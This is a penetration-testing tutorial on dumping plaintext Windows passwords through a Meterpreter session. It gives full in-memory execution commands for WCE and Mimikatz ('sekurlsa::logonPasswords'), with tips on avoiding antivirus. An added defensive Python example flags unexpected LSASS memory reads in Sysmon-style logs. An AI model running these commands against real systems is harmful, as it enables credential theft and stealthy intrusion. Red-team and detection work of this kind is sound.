While hashes are great and passing the hash is an effective attack method, it never hurts to have plaintext passwords. Companies tend to reuse passwords on various systems or use the same password style across their network.
Currently the two primary tools for doing this are WCE and Mimikatz. Both methods will be shown over an existing Meterpreter session.
First up, WCE the old way: dropping a binary.
As you can see, this involves dropping a binary to the target machine.
Time to take a look at the execute command.
-m looks like a fun option.
Running in memory will give you a better chance of antivirus avoidance.
Let's try WCE again without dropping the binary:
execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w
Next up, Mimikatz:
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
While both of these are executed in memory, WCE writes a DLL to disk when it's running. Mubix has a detailed blog post on Mimikatz in memory. This gives Mimikatz a great advantage over WCE, since it never touches disk.
More information on in-memory execution can be found here – Eternal Sunshine of the Spotless RAM
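From the defender's side, tools of this kind obtain credentials from the LSASS process, so a run that leaves nothing on disk can still show up in process-access telemetry. The following is an added example, not part of the original post: it filters records shaped like Sysmon Event ID 10 (ProcessAccess) for unexpected images reading lsass.exe. The sample events and the allowlist are constructed, and it assumes the in-memory process appears under the dummy image given with -d (calc.exe above).

```python
# PROCESS_VM_READ access right: required to read another process's memory.
PROCESS_VM_READ = 0x0010

# Assumption: images expected to read LSASS on this host; tune per environment.
EXPECTED_READERS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

LSASS = r"C:\Windows\System32\lsass.exe"

# Constructed sample records using Sysmon Event ID 10 field names.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\calc.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    # Query-only access without VM read: not a memory read.
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1000"},
    # Same source, but the target is not LSASS.
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\calc.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1010"},
    # Process creation event: ignored by this check.
    {"EventID": 1, "Image": r"C:\Windows\System32\calc.exe"},
]


def suspicious_lsass_reads(events, expected=EXPECTED_READERS):
    """Return (source image, access mask) for unexpected LSASS memory reads."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 10:
            continue
        if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        try:
            access = int(ev.get("GrantedAccess", "0"), 16)
        except ValueError:
            continue  # malformed mask: skip rather than crash the pipeline
        source = ev.get("SourceImage", "")
        if access & PROCESS_VM_READ and source.lower() not in expected:
            hits.append((source, hex(access)))
    return hits


if __name__ == "__main__":
    for source, access in suspicious_lsass_reads(SAMPLE_EVENTS):
        print(f"ALERT: {source} read LSASS memory (GrantedAccess {access})")
```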
Mimikatz – http://blog.gentilkiwi.com/mimikatz
Mimikatz english version – https://github.com/thomhastings/mimikatz-en
Windows Credential Editor (WCE) – http://www.ampliasecurity.com/research.html
Metasploit – http://www.metasploit.com/download/